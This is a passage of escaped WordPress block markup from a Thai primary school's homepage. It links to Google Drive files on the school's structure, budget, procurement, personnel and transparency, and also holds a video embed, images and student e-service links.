href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" 